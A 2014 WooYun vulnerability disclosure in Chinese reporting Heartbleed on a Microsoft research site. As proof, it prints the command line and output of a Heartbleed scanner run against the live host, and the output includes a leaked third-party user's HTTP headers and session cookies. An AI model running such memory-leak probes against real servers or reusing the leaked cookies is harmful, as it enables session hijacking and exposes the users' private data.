当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082633

漏洞标题:microsoft.com某站点存在OpenSSL HeartBleed漏洞可读Cookie

相关厂商:microsoft.com

漏洞作者: lijiejie

提交时间:2014-11-09 12:55

修复时间:2014-12-24 12:56

公开时间:2014-12-24 12:56

漏洞类型:系统/服务补丁不及时

危害等级:中

自评Rank:6

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

microsoft.com某站点存在OpenSSL HeartBleed漏洞,验证可读Cookie

详细说明:

https://ds3.research.microsoft.com
存在OpenSSL HeartBleed漏洞。
验证可读 cookie。

漏洞证明:

ms_heartbleed.PNG


我只读ascii字符。

D:\Scanner\openSSL>new_test.py ds3.research.microsoft.com
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 5466
 ... received message: type = 22, ver = 0302, length = 525
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
.@....SC[...r....+..H...9..w.3....f.....".!.9.8...5.....3.2.....E.D...../...A...
I.....4.2...#.TML, like Gecko) Chrome/38.0.2125.111 Safari/537.36..Referer: http
s://www.google.com/..Accept-Encoding: gzip,deflate,sdch..Accept-Language: en-US,
en;q=0.8..Cookie: MC1=GUID=4e3448c8d79b4d4aa81071b43a78de0b&HASH=4e34&LV=20143&V
=4&LU=1393696433656; A=I&I=AxUFAAAAAAB7CQAAmpSqxu5E+Krf9iqiJBT3EA!!&V=4; WT_NVR_
RU=0=msdn:1=:2=; msdn=L=en-US; msresearch=%7B%22version%22%3A%225.0%22%2C%22stat
e%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A13
97427833081%7D%2C%22lastinvited%22%3A1407896151170%2C%22userid%22%3A%22139742783
30814520944328978658%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5B%22p218292485%
22%2C%22p234872763%22%5D%2C%22graceperiod%22%3A5%2C%22trackertimestamp%22%3A0%7D
; _wt.user-736484=WT3smkaDVP04tKDsICBO78vzTOfmRGF9kr4D8pDCJNqhxod3lzVJUHj0FYF_lz
UHe5czp6DBBMYUTJmYzKiEZOmSWEyyhKiWZt4LHFpo1aePA2TXTYzYKPEXF5lIOYVs0iymmyPAWnFoAQ
sPvy4nud9_B79we84ls2i0QRNqpRbv-CWV3p89_PO2iAemiK4v5w5zcr1GjeaLeUyw0Nc; _wt.contr
ol-736484-ta_FreeDownlaods=WT3BloHw5jb4Lqr21ktnTLR60cBtOEhxFU4lBDusqxRzj3rM3Nrnp
Nljm03sS5xi-9fnqYYjiCuSqyyb_H74MBZmcH-HP2wvDNTdlUtsgy8Ywp9piB3JJYO2C5Tllw41vvOm5
zlhqtUSIBwbly86oLQHOmJRy9H3KyXBleB6o1p9HOO52PDtoQed3_agAtgjMiXW3_EEPUgsDwFrPFhRJ
dZw3hQbVV3QgyEABgW4VVd6VUdm7jNcLwt2DY4qXvogbIMNtQK03OKJYhugiUB; MSFPC=ID=4e3448c
8d79b4d4aa81071b43a78de0b&CS=3&LV=201409&V=1; ANON=A=9EE784A569939CAEF3535474FFF
FFFFF&E=fba&W=1; NAP=V=1.9&E=f60&C=BsqNVzS2WcEsPHKmzRwfU25ZKDFhLjrHS0uSQkLdUNlD6
5zGyM6DwA&W=1; MUID=146D9A1D651B66A93C639FED611B6451; smcexpticket=100; omniID=1
397427742511_a41a_868c_fccd_ca3032ac1f8c; s_cc=true; s_sq=%5B%5BB%5D%5D; TocPosi
tion=1; WT_FPC=id=1e4bbeb0-f358-4a25-be79-c94f5dd99600:lv=1415220010228:ss=14152
18748608 ..:Iz
WARNING: server returned more data than it should - server is vulnerable!

修复方案:

upgrade

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论

  1. 2014-11-09 13:27 | Jack.Chalres ( 实习白帽子 | Rank:39 漏洞数:15 | ..............)

    忽略..

  2. 2014-11-09 22:05 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    难道微软也用OpenSSL?